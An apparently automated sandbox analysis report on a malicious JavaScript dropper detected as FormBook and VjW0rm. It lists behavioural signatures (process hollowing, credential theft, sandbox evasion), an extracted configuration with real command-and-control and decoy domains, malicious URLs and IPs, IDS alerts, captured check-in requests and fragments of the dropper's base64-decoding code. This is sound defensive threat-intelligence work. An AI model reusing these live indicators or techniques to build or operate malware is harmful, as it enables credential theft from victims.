Windows Analysis Report
CIQ-PO162688.js

Overview

General Information

Sample Name: CIQ-PO162688.js
Analysis ID: 635313
MD5: ebcb99f17238dde1ca4c12316ebce4a7
SHA1: 1662814aa8638312144d7be033875b2365e89696
SHA256: e873129006fb7f83c9bec9516fd3ce2e3737f79df1458606445e61926a844f4a
Tags: jsVjw0rm

Detection

FormBook, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Wscript called in batch mode (suppress errors)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
JavaScript source code contains call to eval containing suspicious API calls
Performs DNS queries to domains with low reputation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.gafcbooster.com/np8s/"], "decoy": ["segredovideos.online", "kishanshree.com", "mjmvn.com", "44bb44.com", "brawlhallacodestore.com", "littlebeartreeservices.com", "topings33.com", "nachuejooj07.xyz", "waermark.com", "halecamilla.site", "basincreekmedia.com", "resolutionmeasles.com", "interlink-travel.com", "siberup.xyz", "getbusinesscreditandfunding.com", "shcylzc.com", "68chengxinle.com", "jkrsbarmybookarmy.com", "geo-pacificoffshore.com", "refreshertowels.com", "localbloom.online", "brandingaloha.com", "84866.xyz", "salondutaxi.com", "harmlett.com", "angelmatic.net", "o7oiwlp.xyz", "thepowerofanopenquestion.com", "tokenascent.com", "udrivestorage.com", "hengyuejiguang.com", "minotaur.network", "ratebill.com", "18w99.com", "2264a.com", "tentanguang.online", "muddybootslife.com", "vitality-patients.online", "heavymettlelawyers.com", "spxtokensales.com", "titair.com", "lazarusnatura.com", "rasheedabossmoves.com", "medyumgalip.com", "liveafunday.xyz", "xn--wsthof-camping-gsb.com", "xfd8asvtivg944.xyz", "myhvn.site", "964061.com", "screeshot.com", "mysbaally.com", "connectfamily.loan", "langlev.com", "labsreports-menalab.com", "gabefancher.com", "jdhwh2nbiw234.com", "pdwfifi.com", "losangelesrentalz.com", "brandpay.xyz", "jlbwaterdamagerepairseattle.com", "wps-mtb.com", "sekolahkejepang.com", "saastainability.com", "multiverseofbooks.com"]}
Source: CIQ-PO162688.js Virustotal: Detection: 25%
Source: CIQ-PO162688.js ReversingLabs: Detection: 15%
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Source: http://www.brandpay.xyz/np8s/ Avira URL Cloud: Label: phishing
Source: http://dilshadkhan.duia.ro:6670/Vreod Avira URL Cloud: Label: malware
Source: http://www.brandpay.xyz/np8s/?3fk4oN=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvKpZqETXTWLI6sH0ZA==&Eh=mhUxl Avira URL Cloud: Label: phishing
Source: http://www.tentanguang.online/np8s/?3fk4oN=v4u/ceKk0Zb55n135mmkOO9h9NxJ7kGAyBx+qrEyA785N/4y0zrdRsBV3cMwWbOW5k3YBKZGqA==&Eh=mhUxl Avira URL Cloud: Label: phishing
Source: http://www.waermark.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.xn--wsthof-camping-gsb.com/np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrePSAiUkYirr Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreecuritycenter7 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreecuritycenterre Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/UZXh0 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrewz Avira URL Cloud: Label: malware
Source: http://www.getbusinesscreditandfunding.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrezjB Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre= Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre8 Avira URL Cloud: Label: malware
Source: http://www.getbusinesscreditandfunding.com/np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl Avira URL Cloud: Label: malware
Source: http://www.xn--wsthof-camping-gsb.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM7d Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre3 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo& Avira URL Cloud: Label: malware
Source: http://www.gabefancher.com/np8s/ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre_3 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo= Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMP Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreem Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreSE Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreKTsNClZO Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreageen-usWScript.Quit Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreineer Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vret Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vren Avira URL Cloud: Label: malware
Source: http://www.topings33.com/np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreo Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreagent Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vrej Avira URL Cloud: Label: malware
Source: www.gafcbooster.com/np8s/ Avira URL Cloud: Label: malware
Source: http://www.waermark.com/np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&aDHdzD=vpgdJ4mxrh Avira URL Cloud: Label: malware
Source: http://www.tentanguang.online/np8s/ Avira URL Cloud: Label: phishing
Source: http://dilshadkhan.duia.ro:6670/Vred Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre_ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZ Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.d Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vree5 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrr Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreX Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreMjdcXHZi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreR Avira URL Cloud: Label: malware
Source: http://www.getbusinesscreditandfunding.com/np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&aDHdzD=vpgdJ4mxrh Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM% Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreU Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreP Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreL Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreM Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreH Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreZ3 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreA% Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/VreN_5 Avira URL Cloud: Label: malware
Source: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bin.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Metadefender: Detection: 48%
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\Irlr8ftbp\u8g48fg0phzxan.exe Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\Irlr8ftbp\u8g48fg0phzxan.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\bin.exe Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\bin.exe ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.3.wscript.exe.18737493000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.bin.exe.fc0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bin.exe.fc0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.3.bin.exe.7bdb30.0.unpack Avira: Label: TR/Patched.Gen
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000003.399769173.0000000000A4E000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.508084202.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.396510235.00000000008A3000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.506615779.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.908149328.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.924263331.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.505879582.00000000008A7000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.508010776.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000003.873844239.0000000000D5D000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.882662944.000000000134F000.00000040.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.876169224.0000000001230000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000002.00000003.399769173.0000000000A4E000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.508084202.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.396510235.00000000008A3000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.506615779.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, help.exe, 00000009.00000002.908149328.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.924263331.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.505879582.00000000008A7000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.508010776.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, u8g48fg0phzxan.exe, 00000012.00000003.873844239.0000000000D5D000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.882662944.000000000134F000.00000040.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.876169224.0000000001230000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: help.pdbGCTL source: bin.exe, 00000002.00000002.509585794.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: help.pdb source: bin.exe, 00000002.00000002.509585794.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C1660 FindFirstFileW,FindNextFileW,FindClose, 9_2_004C1660
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C1659 FindFirstFileW,FindNextFileW,FindClose, 9_2_004C1659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft

Software Vulnerabilities

Source: CIQ-PO162688.js Argument value: ['gYMty,WSH.CreateObject("adodb.stream")', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty","WSH.CreateObject("adodb.stream")"']
Source: CIQ-PO162688.js Argument value: ['gYMty,WSH.CreateObject("adodb.stream")', '"gYMty=WSH.CreateObject("adodb.stream")"', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",466', '"gYMty","WSH.CreateObject("adodb.stream")"']
Source: CIQ-PO162688.js Argument value: ['gYMty,WSH.CreateObject("adodb.stream")', '"gYMty=WSH.CreateObject("adodb.stream")"', 'var H3br3w,WSH.CreateObject("microsoft.xmldom").createElement("mko"),H3br3w.dataType,"bin.base64",H3', '"gYMty=","WSH.CreateObject("adodb.stream")",466', '"gYMty","WSH.CreateObject("adodb.stream")"']
Source: CIQ-PO162688.js Argument value: ['"gYMty=WSH.CreateObject("adodb.stream")"', '"var H3br3w=WSH.CreateObject("microsoft.xmldom").createElement("mko")"']

Networking

Source: C:\Windows\explorer.exe Network Connect: 81.169.145.161 80
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.172 80
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80
Source: C:\Windows\explorer.exe Domain query: www.localbloom.online
Source: C:\Windows\explorer.exe Network Connect: 23.19.171.24 80
Source: C:\Windows\explorer.exe Domain query: www.siberup.xyz
Source: C:\Windows\explorer.exe Domain query: www.brandpay.xyz
Source: C:\Windows\explorer.exe Domain query: www.getbusinesscreditandfunding.com
Source: C:\Windows\explorer.exe Domain query: www.shcylzc.com
Source: C:\Windows\explorer.exe Domain query: www.thepowerofanopenquestion.com
Source: C:\Windows\explorer.exe Domain query: www.xn--wsthof-camping-gsb.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80
Source: C:\Windows\explorer.exe Domain query: www.vitality-patients.online
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Domain query: www.harmlett.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80
Source: C:\Windows\explorer.exe Domain query: www.waermark.com
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 68.66.224.33 80
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.149 80
Source: C:\Windows\explorer.exe Domain query: www.tentanguang.online
Source: C:\Windows\explorer.exe Domain query: www.angelmatic.net
Source: C:\Windows\explorer.exe Network Connect: 185.134.245.113 80
Source: C:\Windows\explorer.exe Network Connect: 23.82.37.10 80
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49790 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49790 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49790 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49818 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49818 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49818 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 198.54.117.217:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 198.54.117.217:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 198.54.117.217:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49886 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49886 -> 81.169.145.161:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49886 -> 81.169.145.161:80
Source: C:\Windows\explorer.exe DNS query: www.siberup.xyz
Source: C:\Windows\explorer.exe DNS query: www.brandpay.xyz
Source: Malware configuration extractor URLs: www.gafcbooster.com/np8s/
Source: Joe Sandbox View ASN Name: STRATOSTRATOAGDE
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl HTTP/1.1 Host: www.topings33.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=cDXfWuCokJFrdCwhVntnDB+RdogU7uBP5U/Sv42Lexzi+FyRpCsvSOHB1BJBbWkp2bvyU0/jbw==&Eh=mhUxl HTTP/1.1 Host: www.siberup.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w==&Eh=mhUxl HTTP/1.1 Host: www.harmlett.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvKpZqETXTWLI6sH0ZA==&Eh=mhUxl HTTP/1.1 Host: www.brandpay.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=v4u/ceKk0Zb55n135mmkOO9h9NxJ7kGAyBx+qrEyA785N/4y0zrdRsBV3cMwWbOW5k3YBKZGqA==&Eh=mhUxl HTTP/1.1 Host: www.tentanguang.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpo9ngwjPS7HOCJSNA==&Eh=mhUxl HTTP/1.1 Host: www.localbloom.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDd38wf67F/cvJLwRDA==&Eh=mhUxl HTTP/1.1 Host: www.shcylzc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl HTTP/1.1 Host: www.getbusinesscreditandfunding.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl HTTP/1.1 Host: www.xn--wsthof-camping-gsb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&Eh=mhUxl HTTP/1.1 Host: www.waermark.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=RNX6HKFDcklLmbBc9PWX652dIgRYJcuZVnkYPjFZaGFpi0fgSjcQ52/zYZHNiyjWO0COcN7HSw==&Eh=mhUxl HTTP/1.1 Host: www.vitality-patients.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl HTTP/1.1 Host: www.topings33.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?aDHdzD=vpgdJ4mxrh&3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w== HTTP/1.1 Host: www.harmlett.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
